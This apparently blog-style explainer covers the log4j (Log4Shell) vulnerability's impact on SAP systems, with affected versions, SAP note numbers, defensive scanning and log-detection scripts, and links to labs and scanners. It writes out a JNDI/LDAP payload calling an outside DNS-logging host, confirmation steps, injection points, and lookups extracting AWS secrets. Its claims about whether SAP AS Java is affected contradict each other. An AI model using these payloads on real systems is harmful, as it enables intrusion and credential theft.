What is the Impact of log4j vulnerability on SAP Systems?

Are you wondering whether your SAP systems are affected by the zero-day security vulnerability in the log4j library? For those outside cyber security wondering what the Log4j vulnerability is: it is possibly the biggest, most dangerous security vulnerability discovered in years (perhaps the most critical since Heartbleed). Here it is in simple, maybe oversimplified, terms. Log4j is a logging library for Java, and Java still powers the vast majority of enterprise software, which means Log4j is pretty much everywhere.

Is log4j used in SAP systems?

Yes. log4j is an Apache library commonly used in Java applications. This particular issue was identified in log4j 2 and fixed in log4j 2.17.0. See the document Apache Log4j Security Vulnerabilities for details.

Which environments are affected?

  1. SAP NetWeaver Application Server Java, all versions
  2. Log4j 2.x library versions below 2.17.0 are affected
  3. Log4j 1.x library versions have not been checked (see Apache Log4j Security Vulnerabilities for details); updating the library is nevertheless recommended, since this version has not been supported or maintained since 2015.
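As an added example (not from the original post or from SAP), a small inventory script that applies the version rules above: it walks a zip-based archive, descends into nested JAR/WAR/EAR entries (the .sda/.sca extensions are assumed here to be zip-based SAP deployment archives), reads the log4j-core version from its Maven pom.properties, and reports 1.x as unmaintained, anything below 2.17.0 as vulnerable, and notes whether JndiLookup.class is still present. The sample archive builder produces constructed test input only.

```python
import io
import zipfile

FIXED = (2, 17, 0)  # first fixed release named on this page
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip", ".sda", ".sca")  # .sda/.sca assumed zip-based

def parse_version(text):
    """'2.14.1' or '2.17.0-rc1' -> (2, 14, 1); non-numeric parts count as 0."""
    parts = [int(p) if p.isdigit() else 0 for p in text.split("-")[0].split(".")]
    return tuple((parts + [0, 0, 0])[:3])

def classify(version, has_jndi):
    """Status a patch owner wants: 1.x is unmaintained, anything below 2.17.0 is vulnerable."""
    v = parse_version(version)
    if v[0] == 1:
        return "log4j 1.x, unmaintained since 2015: upgrade"
    if v < FIXED:
        return "vulnerable, JndiLookup.class " + ("present" if has_jndi else "removed")
    return "fixed"

def scan_archive(data, path="<root>"):
    """Walk a zip-based archive given as bytes, descending into nested archives;
    return [(entry path, status)] for every log4j-core found."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            version = next((l.split("=", 1)[1].strip() for l in props.splitlines()
                            if l.startswith("version=")), None)
            status = classify(version, JNDI_CLASS in names) if version else "version unknown"
            findings.append((path, status))
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                findings.extend(scan_archive(zf.read(name), f"{path}/{name}"))
    return findings

def make_sample_archive(version=None, include_jndi=False, nested=None):
    """Constructed test input: a fake log4j-core JAR, or an app archive wrapping one."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only, not real code
        if nested:
            zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", nested)
    return buf.getvalue()
```

To run it against a real deployment, read each archive from disk into bytes and pass it to scan_archive; a "fixed" status only means the version threshold on this page is met.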

What are the Java Core components impacted?

SAP NetWeaver Application Server Java is not impacted by CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105. This applies to all the AS Java Core Components (check SAP Note 1794179).

How to fix it?

Check the SAP notes below:
  • 3129883 – CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 – AS Java Core Components' impact for Log4j vulnerability
  • 3129934 – Log4j vulnerabilities – no impact for SAP Data Services, SAP Cloud Integration for Data Services
  • 3129897 – CVE-2021-44228 – Log4j vulnerability – no impact on SAP Adaptive Server Enterprise (ASE)
  • 3130846 – Detecting and remediating log4j CVE-2021-44228 vulnerabilities in SAP Cloud Integration NEO and CF applications
  • 3131007 – CVE-2021-44228 – Log4j vulnerability – no impact on SAP Information Steward
  • 3131671 – (CVE-2021-44228) Impact of log4j vulnerability to CA Wily Introscope EM Server – Solution Manager – Focused Run
  • 3130900 – (CVE-2021-44228) Impact of log4j vulnerability to CA Wily Introscope EM Server – Solution Manager – Focused Run (you can also check the new SAP Solution Manager Tcodes)

SAP Developer News on log4j vulnerability

How does it work?

Note: the Java logging library log4j has an unauthenticated RCE vulnerability if a user-controlled string is logged.

A specially crafted payload is injected into headers, input fields, or query/body parameters, for example:
https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}

  1. Use a service like dnslog.cn and create your DNS subdomain. Example: qwe3er.dnslog.cn
  2. Use this subdomain to craft the payload and send it with the request. Check the requests received by the DNS service for confirmation.
  3. You should receive a similar request (with host and Java version): jv-11.0.13-hn-73a957d15746.qwe3er.dnslog.cn

Test Environments

You can use these test environments to inspect the behavior of this vulnerability:
https://github.com/leonjza/log4jpwn
https://github.com/christophetd/log4shell-vulnerable-app

Challenges & Labs (Rooms)

You can use these challenges and labs (rooms) to practice this vulnerability:
https://pentesterlab.com/exercises/log4j_rce/course
https://tryhackme.com/room/solar

How To Identify (Services)

You can use these websites to create a DNS address (token) for your payload:
https://canarytokens.org (Token Type: Log4Shell)
https://dnslog.cn
https://app.interactsh.com

How To Identify (Scanners)

You can use these scanners to check whether the target website is vulnerable:
https://github.com/fullhunt/log4j-scan
https://github.com/adilsoybali/Log4j-RCE-Scanner

What Information can be Extracted?

List of places where the payload can be injected:
  • E-mail header
  • Username
  • Password
  • E-mail address
  • Filename
  • Query/Body
  • File content
  • Document/Image EXIF
  • or inside any of these headers: Authorization, Originating-Ip, X-Remote-Addr, Cache-Control, Referer, X-Remote-Ip, Cf-Connecting_ip, True-Client-Ip, X-Wap-Profile, Client-Ip, User-Agent, Authorization: Basic, Contact, X-Api-Version, Authorization: Bearer, Cookie, X-Client-Ip, Authorization: Oauth, Forwarded-for-Ip, X-Forwarded-For, Authorization: Token, Forwarded-For, X-Leakix, Forwarded, X-Originating-Ip, If-Modified-Since, X-Real-Ip

Lookups that the vulnerable library resolves inside the logged string, and therefore the information that can be extracted:
  • ${hostName}
  • ${sys:os.name}
  • ${sys:user.name}
  • ${sys:os.arch}
  • ${sys:user.home}
  • ${sys:os.version}
  • ${sys:user.dir}
  • ${env:JAVA_VERSION}
  • ${sys:java.home}
  • ${env:AWS_SECRET_ACCESS_KEY}
  • ${sys:java.vendor}
  • ${env:AWS_SESSION_TOKEN}
  • ${sys:java.version}
  • ${env:AWS_SHARED_CREDENTIALS_FILE}
  • ${sys:java.vendor.url}
  • ${env:AWS_WEB_IDENTITY_TOKEN_FILE}
  • ${sys:java.vm.version}
  • ${env:AWS_PROFILE}
  • ${sys:java.vm.vendor}
  • ${env:AWS_CONFIG_FILE}
  • ${sys:java.vm.name}
  • ${env:AWS_ACCESS_KEY_ID}
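The detection side of the payload shown under "How does it work?" and of the lookup list above, as an added example that is not part of the original post: it scans constructed access-log lines (hostnames are placeholders, no real system), URL-decodes them, collapses the ${lower:}/${upper:} and ${:-} nesting that is commonly used to hide the literal "jndi" (this goes beyond the plain form on the page), and reports the resolution scheme plus which of the listed lookups the request tried to resolve, so responders can scope what may have been exposed.

```python
import re
import urllib.parse

# Constructed sample access-log lines (no real system); hostnames are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET /?test=${jndi:ldap://jv-${sys:java.version}'
    '-hn-${hostName}.example.invalid/exp} HTTP/1.1" 200 -',
    '10.0.0.6 - - [11/Dec/2021:10:02:15 +0000] "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - [11/Dec/2021:10:03:44 +0000] "GET /api HTTP/1.1" 500 '
    '"${${lower:j}ndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.example.invalid/a}"',
    '10.0.0.8 - - [11/Dec/2021:10:04:00 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F'
    'example.invalid%2Fx%7D HTTP/1.1" 200 -',
]

# ${lower:x}/${upper:x} and ${anything:-x} both evaluate to x; collapsing them
# exposes a hidden "jndi" token without executing any lookup ourselves.
TRANSFORM = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)
# Lookups from the list above that a payload embeds to read host facts or secrets.
LOOKUP = re.compile(r"\$\{(?:hostName|(?:sys|env):[^${}]+)\}")

def normalize(line):
    """URL-decode and repeatedly collapse nested lookups until nothing changes."""
    s = urllib.parse.unquote(line)
    prev = None
    while prev != s:
        prev = s
        s = TRANSFORM.sub(lambda m: m.group(1), s)
        s = DEFAULT.sub(lambda m: m.group(1), s)
    return s

def analyze(line):
    """Return {'scheme', 'lookups'} for a line carrying a JNDI lookup, else None."""
    s = normalize(line)
    m = JNDI.search(s)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "lookups": sorted(set(LOOKUP.findall(s)))}

def scan(lines):
    """Index every suspicious line so responders can pivot to source IP and target."""
    hits = []
    for i, line in enumerate(lines):
        result = analyze(line)
        if result:
            hits.append((i, result))
    return hits
```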

Takeaways

  • Handle open source code with extreme skepticism.
  • Expand the aperture of hunt and incident response activities to take into account exploit attempts that may have occurred in the prehistory of the vulnerability.
  • Build antifragile defenses in depth, such that even a critical remote code execution vulnerability like this is just one of many moves an opponent must make in a much grander game of chess.